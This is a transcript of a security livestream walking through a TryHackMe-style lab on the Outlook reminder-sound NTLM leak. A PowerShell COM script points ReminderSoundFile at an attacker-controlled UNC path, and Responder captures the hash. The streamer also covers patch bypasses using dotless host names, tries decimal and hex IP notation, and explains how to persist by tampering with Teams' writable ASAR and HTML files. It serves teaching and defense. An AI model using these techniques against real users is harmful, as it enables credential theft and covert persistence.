Okay, cool. I found my exploit for this. So we'll see if it looks like... Yeah, this is out of our mode. So I modified this one to work slightly differently. This is what the one I started with. But we will modify it slightly. So let's hang on to it. Let's see what the instructions for this thing actually are. We can close this. And we can close Zap. We don't need Zap running anymore. Okay. We have a trial version of Outlook. Yeah, we're just gonna play with this. Yeah, we can run Responder or SMB server or whatever. So, yeah, there is a reminder sound file here. It's kind of cool. We're seeing this in, oh, Outlook Spy. That's how they're doing that. Okay. So let's take a look at the script as is so we can understand what it's doing. Oh, good. I can zoom this in. Beautiful. So let's take a look at this. We have a function send calendar NTLM leak. And it takes a recipient, a remote file path, a meeting subject, and a meeting body. Notice what we're doing here. In PowerShell, we're creating a new COM object, Outlook.application. We're interacting with Outlook directly via PowerShell through the COM object API. As I fix the focus on my camera, because it never likes to stay where it should. And then we have we're creating an OL appointment item. An OL appointment item is an object in the Outlook like class structure. By the way, you can just look this stuff up. And you can learn about all the parts of it. And so what we're setting, if we look carefully here, is this reminder sound file property, which if we look at it carefully, has this reminder sound file. Returns or sets a string indicating the path and file name of the sound file to play when the reminder occurs. This can be a path. Now I should say, Microsoft has patched this, but it is, as I recall, the patch isn't 100% coverage. There were certain things that they prevented. Oh yeah, it was basically a regular expression, what they did for the sound file, and it removed dots. And the reason that's a problem is that if you add something to like Etsy hosts as a host name that doesn't have dots in it, it should still work. Or if you're in an environment with domain search, you can just add a host name, and again, it'll still just work because they didn't account for that. So what is the solution, right? You got to be careful with SMB. This is like a pretty good post-exploitation move, I think. Especially if your target is running an older version of Outlook, right? If they're not using the 365 version or using the web app. This is where, large enterprises are more vulnerable to things like this because they're going to be running older software for a longer time because patching takes forever, licenses, whatever. Hey, the D2, thanks so much for that follow. Sorry, I missed it before. Okay, so our script here, it's setting all this meeting status. We're setting a subject, location, all of this. And then it'll set... So this is kind of cool. By default, this script is creating a 2-hour meeting, which is criminal. But whatever. Notice that it also has reminder override default. You have to set this in order for this to work, and reminder set and reminder place sound. All three of these have to work or have to be set in order for the event to trigger. Now this one will send it. The save calendar, a 2-hour pre-meeting for next week's meeting. Ugh. Although I actually made my team do a 2-hour meeting on Friday morning, not Friday afternoon. I feel bad about it, but I had to because we were doing a defer lab, and like defer takes forever. The fact that we were able to complete it in 2 hours was a miracle. Pro time management tip, by the way. Make your lunch hour begin 10 minutes before your actual lunch and end 10 minutes after your actual lunch. Not that that's the amount of time that you're actually going to be taking if you have to stick to an hour, but that'll just prevent meetings getting scheduled with you before and after. So I don't know about you, but the last thing I want after I come back from lunch is to jump right into a meeting. Now, this save calendar NTLM leak does the same thing, except that it saves it as a file rather than sending it, and then you can take a look at the dot message. So let's run this and then play with it a little bit. And we'll see the vulnerability happen. Let's pop open Outlook here so that we have it available for us. And I'm also going to have to set up responder. actually. There's no reason I would have to be anywhere else, but... We'll just get this running. Okay. So we have ourselves our demo here. Test at thm.luck. Okay, fine. Nifty. Now, let's run this save calendar NTLM leak situation. We'll run this script, and that loads these functions into our shell. And if we run save calendar NTLM leak, right, we can do remote file path. So that's going to be 10.13.6.96. I think I finally remembered it. Test.wave. And then our meeting subject is evil meeting. And then we're going to do meeting body. Will this work? Oh, it does. Okay, cool. Okay, so we just saved that to the desktop. And it was called... What was it called? Doesn't seem like it got saved at all. Oh, wait. No, that's right. OL meeting. Would it be saved as a draft in Outlook? Hey, Matthias. Oh, yeah, it did. There it is. It got saved, and indeed, here it is. There's the evil meeting. It got saved twice. That's right. I was looking for a message file, but you're right. Yes, and you can see that the pop-up showed up, but now, here's the trick. Did we actually pick up anything in Responder? We sure did. That one worked great. Now, if you want to do it another way, so there's kind of two ways to do it. This one works fine. There's also, if you want to do it a little bit more, I don't know, like stealthily, I think is the way that I want to say it, because this appointment is like annoying, and it stays on the calendar. But I just wanted to show you that you can actually do this with a regular old email. Let's write that code. So it's going to look like this. We will modify the save so that we don't have to send anything. And we're going to save mail NTLM leak. And remote file path, meeting subject, meeting body. This looks good. Now, the other thing I had a problem with was that when I was doing create item, when I was trying to do it, I couldn't get OL appointment item to work for me. So I used the number, and you can actually do that. If we go to our Outlook. Application object. Methods. Create item. The OL item type. Here are our options. There's OL item, appointment item, which is item 1. And then there's a mail item, which is item 0. So we can try the quotes OL mail item. It's probably going to work here because this is a controlled environment. But if you didn't, if for whatever reason that was failing, you can just use the number 0 because that's what this is a reference to anyway. We're still going to do remote file path. We're going to change this to subject and body. And do we need a recipient? I don't think we do. So reminder sound file. We are going to need recipients. No, we don't. For now. We are going to remove this meeting status, though. It has a subject. That's correct. It doesn't have a location. Body is just body, so we're going to kill that. Oops. Kill that. And we don't need a start end either. So actually this is much cleaner in a lot of ways. And then we're gonna change new cal to mail in each of these. Find its selection. Just new cal. New mail. Done. Would interacting via a comm object still work if Outlook wasn't running? Answer: yes, I think, but it wouldn't pop up to demonstrate the vulnerability. We'll test it. Let's run it once with it open, and then we'll try it again. Yeah. MSec, thanks so much for that raid. Hope your stream was good. Maybe Outlook needs to be running. Or maybe it'll pop it open. We'll find out. All right, let's see how this goes. Okay. And now, instead of running save calendar, we're going to run save mail and TLM leak. And it's in my drafts. So it has to be sent. So we can send it to ourselves, I guess, to make this happen. Although, since this thing isn't actually connected to anything, this may not work at all. So for this, we would do recipient. And then we would add new mail dot recipients dot add recipient. Okay, so we run this again. We'll see if this works. Test at thm.block. I feel like this isn't going to actually fire off because we don't have a mail server that's actually doing the job. Look at that. It says a program is trying to access email. information stored in Outlook. Go for it. Yeah, so that created two drafts because it didn't send. Oh, wait, we didn't save. That's why. There it is. Okay, so the test meeting popped in. Oh, there you go. So once I was able to send it to myself, it works fine. So notice that this is a regular email, but it created a pop-up. Let's do that again a little bit more cleanly. So we're going to basically take this little copy pasta, and it's identical except that we're going to call send rather than save. All right. Let's delete those emails, our two drafts here. Or our two items in our draft. And now, let me clean up responder. Why not remove the reminder objects? So, Mr. PC Fix-It, the reminder object has to trigger. That is the thing that the exploit is basing on. Because notice that it's the reminder sound file that is the UNC path. That pop-up has to happen. We don't have a choice about that. So we're going to change this to send. And we should get a pop-up. Indeed, we did. Well, no, we got a different pop-up. There we go. And then there's our pop-up here. Oh no, that was just the new message pop-up. We didn't get the... Interesting. So I was able to make this happen myself. It's interesting that this isn't firing off. But I think that might be some weirdness about how it's coming in. No, this is a different box. All right. Well, obviously we're able to make this happen with the calendar invite version of this. So if we do send calendar NTLM leak, let's see what this does. Should do the same thing where it's like, okay, so that pops the reminder. You can do this with email. I know for a fact you can do it with email, but I guess whatever. So we're capturing the hash there. That's working okay. And here it is, which presumably they want us to crack. So we will do that. Can you set a delayed email reminder? Our mail item properties are the following. deferred delivery time. Let me run it one more time. And actually, now that we're here, let's delete these, and we'll get rid of the invite on our calendar as well. I don't want to send a cancellation. I just want it to die. Fine. Go away. Oh, Outlook. You are the worst. All right. Now, we wanted to test whether this thing happens. What happens when we do it with Outlook closed, right? So let's find out. It pops Outlook open, is what happens. So yeah, this is going to be a little bit more useful if somebody's Outlook is already running. But whom do you know that uses Outlook that doesn't have it running 24/7? By the way, notice that it popped open and then it closed again. It didn't remain running. See that? There's our pop-up. Try the mail version one more time. Is there something else they wanted us to do in this room, by the way? Or is it just a playground for this vulnerability? Yeah, like, we know why this is dangerous. And then here's a Sigma rule? Yeah, an ER rule for it. Okay. Wow, easy points on TryHackMe if you want to look at this room. There's nothing to actually do. You don't even have to start the room. Or start the machine. You just play with it. I am top 1%, baby! I also don't care. Rebooting your PC may not run Outlook by default. Yeah, but, like, let's think about this reasonably. The attack we're talking about here is post-exploitation. So you already have C2 on somebody's machine, right? They're working in an organization. They use Outlook for their email. They've decided to use the Outlook desktop client. That thing's going to be the first thing they open when they reboot their machine, assuming they turn off their machine ever voluntarily. So that's going to be running. That's not a concern. Teams does start automatically. Yeah. I mean, most folks will put Teams in the startup programs. DCI Banks, cool name. Yes. If it's in the startup folder, which is the configuration I most commonly see with Teams. The same is true of Outlook, but it doesn't matter. Like, either way, if you're using that application, the user's going to open it up, at which point you're good. All right, I'm going to try the mail thing again, because It bothered me that that didn't work. Did we do something wrong here? OL mail item, that's fine. Remote file path is good. Yeah. Subject, body. Reminder override, reminder set, reminder play sound. Was there anything else that we needed? I don't think so. Is there a way to use Teams to enable this leak? Answer, no, because Teams does not honor the reminder sound file thing. It's only Outlook. If we look at the... Where were we? The mail item. Reminder sound file. This is the thing. And it is part of Outlook's class. OL mail item or OL calendar item situation. And when you... I don't think Teams honors it. We can check. I don't know if that's published. Let's see. Office library reference. Yeah, no, that's the other thing. It's all a web app. So that's the thing. When you, I should mention this. When you open Teams, right? What's actually happening? Most of the Teams UI does not live on disk. Exactly. Teams is a PWA. When you progressive web app, when you load Teams, most of the UI is being loaded in through essentially a web browser. It's a React app under the hood. There are parts of Teams that live on disk, but they're the parts that you need if you're offline. So, for example, there's this file inside of Teams called oops.html, and that is HTML that lives on the disk and hilariously can be modified. So I did some research on this. A while ago, people were mad at me because they were like, we've already seen that Teams is vulnerable. This is dumb. But I feel like sometimes it's important to revisit this. So yeah, I actually did some research on compromising Teams. Some of it was not, it was work that had been done. I was reproducing it slightly differently. As an ASAR file, which is where most of the app logic lives, the JavaScript app logic, you can extract this because it's a no compression tar file, modify the JavaScript in there and compromise things like that. Right? There's your main.bundle.js once it's extracted. And then you can do whatever you want, right? You can add node code that allows you to run code execution through Teams. So this is a great persistence mechanism. And the reason you're able to do that, even without privileges, is because Teams installs to app data local rather than to program files. But that's not all. In addition, any of the HTML that lives there is also writable. And, by the way, the oops.html is interesting because you can... Do I still have Teams installed? No, I don't. You can modify the HTML. It has a content security policy that prevents inline code, but you can just change it because it's a meta tag. And then you can run cross-site scripting on there. So they changed the Electron ASAR to something else. I believe what they did was they added integrity checking to it. That was the plan anyway, because I got an earful from the Electron developers. Like, we know! And it's coming. We already have the integrity checking in Mac OS as an option, and it's coming for everything else. There's a lot more, though, in Teams. So, for example, other stuff that you can do. The squirrel.exe updater that runs the updater for Teams looks for an updater.exe this vuln was patched back in March. You're talking about the Outlook vuln. Okay, so let's DCI banks. Enforced SMB signing is important. That is true. Also, way harder to do in most organizations than you think, especially in areas, organizations that have some legacy hardware that they have to run. So, we don't like the word just here because there tends to be complexity in deploying a lot of this stuff that is real and often is obviated by just saying, oh, just patch. And we want to honor the rationale for why some of this is difficult. And as I was mentioning before you got here, I think, the vuln was patched, but not entirely. So, for example, the patch was a regular expression check that looks for dots in your remote sound file. And so if you have a host name that doesn't have dots in it, that'll still work. So local domain search and hosts, Etsy hosts. At my org, we don't have a single legacy machine. You're either very, very special or wrong. Almost everybody does. So, okay. Understand then that your situation, DCI banks, is extremely rare. Okay, good job. That's not the reality for most people. At any rate, Teams is not going to be vulnerable to this particular thing. It's an Outlook-specific situation. Try this one more time with the mail. I do think there might be something weird with the bounce back mail that makes the reminder not fire. Let me try closing Outlook and opening again and see if the reminder pops. Is it actually off? Yeah, weird. The invite is not popping up for regular mail. Maybe that got patched too, that it only works for invites. Nevertheless, now there's one more thing I do want to try before we get out of here, and that is, I don't think this is going to work, but I want to try it. So non-standard IP notation. You can, in fact, do this. Right? And the reason it works is because, obviously, every octet of an IP address is just meant to be zeros and ones. So if you combine them, you get a decibel number. 10, 13, 6. No, I want 6.96. Now, check this out. If we go here, works, right? So now my question is, does it work in UNC paths? sure does. Oh, but interesting. No, it doesn't. So we got the pop-up, but the UNC path didn't resolve. So we created the event, but it had a bogus UNC path in it. So that's unfortunate. There's also, I mean, you can convert that to hex too, and it also works. We'll try that as well. I don't think we use the 0x. I think we just do the 0a. So maybe we do. Yeah, we do the 0x. So we'll try that as well. Hopefully you just learned that you can write IP addresses in decimal and hex if you didn't know that. This, by the way, this is a straight up TTP. Malware actors, threat actors use this all the time to beat very simple signatures, right? Because if you're just looking for IPv4 addresses in standard notation, you're not going to see them if they're written like this. Let me delete the existing stuff here. Oh no, that was just the original allow. Okay, there's the pop-up. No dice. I did give it the right IP address, right? 10.13.696. Yes, I did. Okay, so good news. Non-standard IP notation does not work for this, right? So the only concern then is host names that don't have dots in them. That's the. Did I actually change the IP to hex? Yes. Oh, no, I didn't. Sorry. Good call, Matthias. Wow. Let's run that one more time. I mean, I'm not optimistic, right? Why would it do hex if it didn't do decimal? But we'll run it. Nah. But yeah, when this thing is patched, if you've added something to Etsy hosts and it's there, or if it's, again, local resolution, right, on a domain search, it'll still work. And that is a concern. So yeah, the other issue is SMB signing. You want to make sure that nobody can run responder or impact an SMB server. You want to be careful of that. But frankly, even then, let me ask this question. I honestly don't know the answer. So if you have a machine that does, it's a legit machine. It's not a Kali machine. I have a compromised Windows host, and I run Inve on it. If it's configured for SMB signing, will Inve be able to deal with that, and will it look like a legit share? I don't know. Yeah, but we're not necessarily talking about a relay. We're just talking about capture. All right. It seems like maybe more testing necessary. But I think with this room done, I think we're going to call it for today. So this is cool. We did a little bit of Windows hacking. I didn't have a super tight plan for today, but hopefully you had some fun. Let's see if there's anybody else who's actually streaming today. Oh, wait. Is Lily actually streaming? No. Man. X the developer is on. That's it. That I know of. All right. So I think since none of the known hackers I know are up, send you on your merry way. Thanks so much. Enjoy the rest of your weekend. I'll be back on Wednesday. And until then, friends, please be good to yourselves, be good to each other, and happy hacking. We'll see you next time.